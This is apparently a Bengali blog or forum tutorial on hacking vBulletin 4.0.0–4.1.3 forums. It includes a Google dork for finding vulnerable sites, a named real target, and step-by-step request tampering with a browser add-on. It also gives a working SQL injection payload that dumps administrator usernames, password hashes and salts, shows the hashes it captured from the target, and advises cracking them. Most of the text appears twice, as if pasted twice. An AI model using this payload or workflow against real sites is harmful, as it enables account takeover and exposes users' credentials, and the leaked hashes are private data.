আজকে আমি লিখবো কি করে ভি বুলেটিন দিয়ে বানানো ফোরাম হ্যাক করা যায়। আর হ্যা, এই লেখা শুধুমাত্র
শেখার জন্যে। অন্য কোন উদ্যেশ্যে ব্যাবহার করলে নিজের দায়িত্তে করবেন।
আসুন তাহোলে শুরু করা যাকঃ
আমার দেয়া হ্যাকিং পন্থা টা কাজ করবেঃ Vbulletin 4.0.0 =>> 4.1.3 (4.1.4 বা তার
উপরের ভার্সনে কাজ করবে না।
গুগল ডর্কঃ Powered By Vbulletin 4.1.0 (আথবা অন্য ভার্সন)
যা যা লাগবেঃ
১। মজিলা ফায়ারফক্স
২। মজিলা addon Http Header (ডাউনলোড করুন এখান থেকে, https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
৩। আল্লাহ প্রদত্ত সবচেয়ে বড় টুলস "ব্রেইন"। :P
গুগল এর সাহাজ্যে Vuln. সাইট খুজে বের করুন।
আমি করেছি, http://www.carrito.net/board
টার্গেট সাইট...
এবার আপনার টার্গেট সাইটে একটা একাউন্ট খুলে ফেলুন।
মেনু থেকে গ্রুপ এ ক্লিক করুন। নিচের ছবির মত।
গ্রুপ মেনু থেকে যে কোন একটি গ্রুপের নাম কপি করুন। যদি কোন গ্রুপ না থাকে তাহলে একটি গ্রুপ Create
করুন "Create Group" এ ক্লিক করে। নিচের ছবির মত। আমার ভাগ্য ভালো যে আমার টার্গেট
সাইটে কিছু গ্রুপ আগে থেকেই তৈরি করা ছিলো। তাই আমি "romba" নামক গ্রুপটির নাম কপি করেছি।
এবার Advanced Search এ যান। নিচের ছবিতে নির্দেসিত।
Search Types: এ Groups এ টিক চিনহ দিন।
Keyword(s): এ আপনার গ্রুপ এর নাম দিন। (আমি দিয়েছি romba)
Exact name এ টিক দিন।
না বুঝতে পারলে নিচের ছবিটি দেখুন।
এবার ফায়ারফক্স এর মেনু থেকে Tools>>Live Http Headers এ ক্লিক করুন।
টার্গেট সাইটের Search Now বাটনে ক্লিক করুন।
টাস্কবার থেকে Live HTTP Headers অপেন করুন।
HTTP Headers এর মধ্যে থেকে type%5B5D=.............. খুজে বের করুন। না বুঝলে নিচের
ছবিটি দেখুন।
খুজে পেলে ওইটুকু সিলেক্ট করে ReplY তে ক্লিক করুন। নিচের ছবির মত উইন্ডো ওপেন হবে।
"=" এর পরে যেখানে শেষ হয়েছে সেখানে নিচের কোডটি কপি করে পেস্ট করুন। এবং Reply এ ক্লিক করুন।
&cat[0]=1) union+select+group_concat(userid,0x3a,username,0x3a,password,0x3a,salt,usergroupid) from user where usergroupid=6#
ছবিটা দেখে নিন। সহজেই বুঝবেন।
হ্যা আমরা প্রায় শেষ প্রান্তে এসে গেছি।
নিচের ছবিতি দেখে নিন আগে। আমরা Admin id and Pass পেয়ে গেছি।
আমার টার্গেট সাইট এ যেটা পেলাম...
Search:Type: Groups; Keyword(s): romba; : Uncategorized, 11403:PacoPH:e3f3de08ff50de3f77eb4fbb7c0ae9e1:!YS6,24169:3Fl24ilV:0c1bcad862e034842962380e9cdd520c:,Y~6,26060:CIVIC turbo WEST:5226f7c8e1815cae6632d04477b5e1c2:GT~6,42738:osva:a50660376692f9b614b9df5a71c59ecf:)+N6
শেখার জন্যে। অন্য কোন উদ্যেশ্যে ব্যাবহার করলে নিজের দায়িত্তে করবেন।
আসুন তাহোলে শুরু করা যাকঃ
আমার দেয়া হ্যাকিং পন্থা টা কাজ করবেঃ Vbulletin 4.0.0 =>> 4.1.3 (4.1.4 বা তার
উপরের ভার্সনে কাজ করবে না।
গুগল ডর্কঃ Powered By Vbulletin 4.1.0 (আথবা অন্য ভার্সন)
যা যা লাগবেঃ
১। মজিলা ফায়ারফক্স
২। মজিলা addon Http Header (ডাউনলোড করুন এখান থেকে, https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
৩। আল্লাহ প্রদত্ত সবচেয়ে বড় টুলস "ব্রেইন"। :P
গুগল এর সাহাজ্যে Vuln. সাইট খুজে বের করুন।
আমি করেছি, http://www.carrito.net/board
টার্গেট সাইট...
এবার আপনার টার্গেট সাইটে একটা একাউন্ট খুলে ফেলুন।
মেনু থেকে গ্রুপ এ ক্লিক করুন। নিচের ছবির মত।
গ্রুপ মেনু থেকে যে কোন একটি গ্রুপের নাম কপি করুন। যদি কোন গ্রুপ না থাকে তাহলে একটি গ্রুপ Create
করুন "Create Group" এ ক্লিক করে। নিচের ছবির মত। আমার ভাগ্য ভালো যে আমার টার্গেট
সাইটে কিছু গ্রুপ আগে থেকেই তৈরি করা ছিলো। তাই আমি "romba" নামক গ্রুপটির নাম কপি করেছি।
এবার Advanced Search এ যান। নিচের ছবিতে নির্দেসিত।
Search Types: এ Groups এ টিক চিনহ দিন।
Keyword(s): এ আপনার গ্রুপ এর নাম দিন। (আমি দিয়েছি romba)
Exact name এ টিক দিন।
না বুঝতে পারলে নিচের ছবিটি দেখুন।
এবার ফায়ারফক্স এর মেনু থেকে Tools>>Live Http Headers এ ক্লিক করুন।
টার্গেট সাইটের Search Now বাটনে ক্লিক করুন।
টাস্কবার থেকে Live HTTP Headers অপেন করুন।
HTTP Headers এর মধ্যে থেকে type%5B5D=.............. খুজে বের করুন। না বুঝলে নিচের
ছবিটি দেখুন।
খুজে পেলে ওইটুকু সিলেক্ট করে ReplY তে ক্লিক করুন। নিচের ছবির মত উইন্ডো ওপেন হবে।
"=" এর পরে যেখানে শেষ হয়েছে সেখানে নিচের কোডটি কপি করে পেস্ট করুন। এবং Reply এ ক্লিক করুন।
&cat[0]=1) union+select+group_concat(userid,0x3a,username,0x3a,password,0x3a,salt,usergroupid) from user where usergroupid=6#
ছবিটা দেখে নিন। সহজেই বুঝবেন।
হ্যা আমরা প্রায় শেষ প্রান্তে এসে গেছি।
নিচের ছবিতি দেখে নিন আগে। আমরা Admin id and Pass পেয়ে গেছি।
আমার টার্গেট সাইট এ যেটা পেলাম...
Search:Type: Groups; Keyword(s): romba; : Uncategorized, 11403:PacoPH:e3f3de08ff50de3f77eb4fbb7c0ae9e1:!YS6,24169:3Fl24ilV:0c1bcad862e034842962380e9cdd520c:,Y~6,26060:CIVIC turbo WEST:5226f7c8e1815cae6632d04477b5e1c2:GT~6,42738:osva:a50660376692f9b614b9df5a71c59ecf:)+N6
USer name:PacoPH
Hash: e3f3de08ff50de3f77eb4fbb7c0ae9e1
SaLt: !YS6,24169:3Fl24ilV
Admin Id: PacoPH
Password: e3f3de08ff50de3f77eb4fbb7c0ae9e1
বি.দ্র. এখানে পাসোয়ারড টি MD5 encoded অবস্থায় আছে এটাকে ডিকোড করতে পারেন
বিভিন্ন সফটওয়্যার দিয়ে অথবা অনেক ওয়েবসাইট আছে যারা ফ্রি তে ডিকোড করার সেবা দিয়ে থাকে